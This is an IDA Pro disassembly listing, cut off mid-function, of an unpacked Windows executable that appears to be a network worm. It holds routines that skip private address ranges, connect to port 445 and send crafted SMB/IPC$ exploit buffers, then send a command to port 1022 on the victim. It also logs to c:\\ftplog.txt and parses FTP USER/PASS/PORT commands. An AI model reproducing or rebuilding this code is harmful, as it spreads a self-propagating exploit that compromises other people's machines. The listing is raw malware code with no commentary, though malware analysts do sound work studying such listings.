;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 6039C698CD64FF6834AC373E4936EAF0
; File Name : u:\work\6039c698cd64ff6834ac373e4936eaf0_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40126C+7C�p
; sub_401F4B:loc_401FC9�p ...
mov eax, dword_4070C0
imul eax, 343FDh
add eax, 279EC3h
mov dword_4070C0, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_4020D9+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4070C0, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_4020D9+11�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call dword_405104
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call dword_405134
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40126C+9C�p
; sub_401F4B+3E�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call dword_40512C
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call dword_405138
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call dword_405130
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401F4B+137�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4022A0
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call dword_40511C
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_4022A0
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call dword_405120
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_405124
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call dword_405128
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40126C+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_405134
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call dword_405138
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
sub_401210 proc near ; CODE XREF: sub_401B59+2B5�p
arg_0 = dword ptr 4
inc dword_4070C4
push esi
push 0
push offset aCFtplog_txt ; "c:\\ftplog.txt"
call dword_405028 ; _lcreat
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40126A
push ebx
push edi
push 2
push 0
push esi
call dword_405024 ; _llseek
push [esp+0Ch+arg_0]
call sub_402300
mov edi, dword_405020
pop ecx
push eax
push [esp+10h+arg_0]
push esi
call edi ; dword_405020
mov ebx, offset asc_406A0C ; "\r\n"
push ebx
call sub_402300
pop ecx
push eax
push ebx
push esi
call edi ; dword_405020
push esi
call dword_40501C ; _lclose
pop edi
pop ebx
loc_40126A: ; CODE XREF: sub_401210+19�j
pop esi
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40126C proc near ; CODE XREF: sub_401A69+7B�p
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4022A0
add esp, 0Ch
mov [ebp+var_10], 2
push 3FEh
call dword_40511C
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_4022A0
add esp, 10h
push 6
push 1
push 2
call dword_405120
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012D1
xor al, al
jmp loc_401379
; ---------------------------------------------------------------------------
loc_4012D1: ; CODE XREF: sub_40126C+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_405124
cmp eax, 0FFFFFFFFh
jz loc_401370
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_4070C8
push eax
call dword_405018 ; lstrcpyA
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030
lea eax, [ebp+var_33C]
push eax
call dword_4050F0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_402300
add esp, 1Ch
test eax, eax
jbe short loc_401362
loc_40133E: ; CODE XREF: sub_40126C+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call dword_405118
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_402300
cmp esi, eax
pop ecx
jb short loc_40133E
loc_401362: ; CODE XREF: sub_40126C+D0�j
push 3E8h
call dword_40502C ; Sleep
mov bl, 1
pop esi
loc_401370: ; CODE XREF: sub_40126C+75�j
push edi
call dword_405128
mov al, bl
loc_401379: ; CODE XREF: sub_40126C+60�j
pop edi
pop ebx
leave
retn
sub_40126C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40137D proc near ; CODE XREF: sub_401A69+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_4070C8
push [ebp+arg_4]
call dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050F0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013B6: ; CODE XREF: sub_40137D+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013B6
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402380
lea eax, [ebp+var_3C]
push eax
call sub_402300
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402380
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_402300
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402380
lea eax, [ebp+var_3C]
push eax
call sub_402300
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402380
lea eax, [ebp+var_3C]
push eax
call sub_402300
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402380
add esp, 2Ch
push [ebp+arg_0]
call dword_405138
mov ebx, eax
cmp ebx, edi
jz loc_401539
push edi
push 1
push 2
call dword_405120
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401539
push 1BDh
loc_401493: ; DATA XREF: .text:off_4065D8�o
mov [ebp+var_14], 2
call dword_40511C
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_4022A0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call dword_405124
cmp eax, 0FFFFFFFFh
jz short loc_401539
mov ebx, dword_405118
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401539
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, dword_405114
call esi ; dword_405114
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401539
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_405114
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; dword_405118
cmp eax, 0FFFFFFFFh
jnz short loc_40153D
loc_401539: ; CODE XREF: sub_40137D+F2�j
; sub_40137D+10B�j ...
xor eax, eax
jmp short loc_40157E
; ---------------------------------------------------------------------------
loc_40153D: ; CODE XREF: sub_40137D+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_405114
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401555: ; CODE XREF: sub_40137D+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call dword_4050F0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401555
push [ebp+arg_0]
call dword_405128
push 1
pop eax
loc_40157E: ; CODE XREF: sub_40137D+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_40137D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401583 proc near ; CODE XREF: sub_401A69+3B�p
; sub_401A69+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call sub_4026C0
mov eax, dword_406A3C
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A40
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050F0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015BD: ; CODE XREF: sub_401583+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015BD
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402380
lea eax, [ebp+var_4C]
push eax
call sub_402300
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402380
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_402300
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402380
lea eax, [ebp+var_4C]
push eax
call sub_402300
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402380
lea eax, [ebp+var_4C]
push eax
call sub_402300
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402380
add esp, 2Ch
push 3FEh
call dword_40511C
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402380
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_4016FF
cmp ebx, 2
jz short loc_4016FF
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_4022A0
mov esi, offset loc_406034
push esi
call sub_402300
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402380
lea eax, [ebp+var_14]
push eax
call sub_402300
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402380
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017D3
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: sub_401583+115�j
; sub_401583+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_4022A0
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402380
mov esi, offset loc_406034
push esi
call sub_402300
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402380
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A34
push eax
call sub_402380
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402380
add esp, 40h
push esi
call sub_402300
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402380
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_40178B: ; CODE XREF: sub_401583+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_40178B
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_4022A0
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_4022A0
add esp, 18h
loc_4017D3: ; CODE XREF: sub_401583+177�j
push 0
push 1
push 2
call dword_405120
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A62
push 1BDh
mov [ebp+var_24], 2
call dword_40511C
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_4022A0
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_405124
cmp eax, 0FFFFFFFFh
jz loc_401A62
mov esi, dword_405118
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, dword_405114
call edi ; dword_405114
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
cmp [ebp+arg_4], 1
jz short loc_4019A0
cmp [ebp+arg_4], 2
jz short loc_4019A0
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402380
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402380
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402380
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A43
; ---------------------------------------------------------------------------
loc_4019A0: ; CODE XREF: sub_401583+3B8�j
; sub_401583+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402380
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402380
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402380
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402380
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402380
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A43: ; CODE XREF: sub_401583+418�j
push eax
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401A62
push 3E8h
call dword_40502C ; Sleep
push [ebp+var_4]
call dword_405128
loc_401A62: ; CODE XREF: sub_401583+264�j
; sub_401583+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_401583 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A69 proc near ; CODE XREF: sub_4020D9+27�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_40137D
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401AEA
lea eax, [ebp+var_84]
push offset dword_406A48
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401AAD
push 0
push esi
call sub_401583
push 0
jmp short loc_401ADA
; ---------------------------------------------------------------------------
loc_401AAD: ; CODE XREF: sub_401A69+36�j
lea eax, [ebp+var_84]
push offset dword_406A44
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401AD0
push 1
push esi
call sub_401583
push 1
jmp short loc_401ADA
; ---------------------------------------------------------------------------
loc_401AD0: ; CODE XREF: sub_401A69+59�j
push 2
push esi
call sub_401583
push 2
loc_401ADA: ; CODE XREF: sub_401A69+42�j
; sub_401A69+65�j
push esi
call sub_401583
add esp, 10h
push esi
call sub_40126C
pop ecx
loc_401AEA: ; CODE XREF: sub_401A69+1F�j
pop esi
leave
retn
sub_401A69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AED proc near ; CODE XREF: sub_40219B+DA�p
; sub_40219B+E6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40500C
test eax, eax
jnz short loc_401B19
push [ebp+arg_8]
push [ebp+arg_4]
call dword_405010
push [ebp+arg_4]
call dword_405000
loc_401B19: ; CODE XREF: sub_401AED+15�j
pop ebp
retn
sub_401AED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B1B proc near ; CODE XREF: sub_401F4B+126�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
call sub_404DA2
push [ebp+arg_4]
mov esi, eax
lea eax, [ebp+var_24]
or [ebp+var_1C], 0FFFFFFFFh
push 24h
push eax
xor eax, eax
push eax
push eax
push eax
push [ebp+arg_0]
push esi
call sub_404D9C
test eax, eax
jnz short loc_401B4D
or eax, 0FFFFFFFFh
jmp short loc_401B56
; ---------------------------------------------------------------------------
loc_401B4D: ; CODE XREF: sub_401B1B+2B�j
push esi
call sub_404D96
mov eax, [ebp+var_1C]
loc_401B56: ; CODE XREF: sub_401B1B+30�j
pop esi
leave
retn
sub_401B1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B59 proc near ; DATA XREF: sub_401EC0+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E84
push esi
push edi
push 0
push off_4068D0
call sub_402300
mov esi, dword_405118
pop ecx
push eax
push off_4068D0
push ebx
call esi ; dword_405118
mov edi, [ebp+arg_0]
jmp short loc_401B97
; ---------------------------------------------------------------------------
loc_401B94: ; CODE XREF: sub_401B59+31A�j
mov ebx, [ebp+arg_0]
loc_401B97: ; CODE XREF: sub_401B59+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call dword_405114
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401BE8
push 0
push off_4068D4
call sub_402300
pop ecx
push eax
push off_4068D4
jmp loc_401E6C
; ---------------------------------------------------------------------------
loc_401BE8: ; CODE XREF: sub_401B59+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401C19
push 0
push off_4068D8
call sub_402300
pop ecx
push eax
push off_4068D8
jmp loc_401E6C
; ---------------------------------------------------------------------------
loc_401C19: ; CODE XREF: sub_401B59+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz loc_401CF5
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402810
mov ax, word_406A68
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402770
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C68: ; CODE XREF: sub_401B59+159�j
test ebx, ebx
jz short loc_401C9C
cmp edi, 4
jge short loc_401C7F
push ebx
call sub_401E8B
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C7F: ; CODE XREF: sub_401B59+116�j
jnz short loc_401C8B
push ebx
call sub_401E8B
pop ecx
mov [ebp+var_18], eax
loc_401C8B: ; CODE XREF: sub_401B59:loc_401C7F�j
cmp edi, 5
jnz short loc_401C9F
push ebx
call sub_401E8B
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C9F
; ---------------------------------------------------------------------------
loc_401C9C: ; CODE XREF: sub_401B59+111�j
push 6
pop edi
loc_401C9F: ; CODE XREF: sub_401B59+135�j
; sub_401B59+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402770
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C68
push [ebp+var_2C]
mov edi, [ebp+var_18]
